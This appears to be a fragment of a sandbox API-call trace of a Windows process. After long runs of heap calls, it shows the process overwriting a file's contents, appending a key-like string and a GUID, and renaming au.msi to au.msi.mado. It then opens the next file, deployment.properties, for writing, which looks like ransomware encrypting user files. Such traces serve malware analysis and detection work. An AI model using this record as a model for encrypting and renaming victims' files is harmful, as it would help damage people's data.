RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0206.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d58 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d28 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eec8 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0206.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0206.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3218d0 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d28 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d58 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87298 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.662] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x25800, lpOverlapped=0x0) returned 1 [0206.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0206.663] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.663] WriteFile (in: hFile=0x63c, lpBuffer=0x3b816a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b816a8*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.664] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.664] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.664] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.664] CloseHandle (hObject=0x63c) returned 1 [0206.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef4b8 [0206.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b7b950 [0206.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4b8 | out: hHeap=0x2c0000) returned 1 [0206.672] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.mado")) returned 1 [0206.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.672] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0206.674] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0206.674] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0206.674] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef4b8 [0206.674] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0206.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0206.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0206.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0206.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.677] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.677] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.677] PathFindFileNameW (pszPath="") returned="" [0206.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0206.678] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.678] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1ea6db0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfec5c570, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0206.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0206.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.678] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=719) returned 1 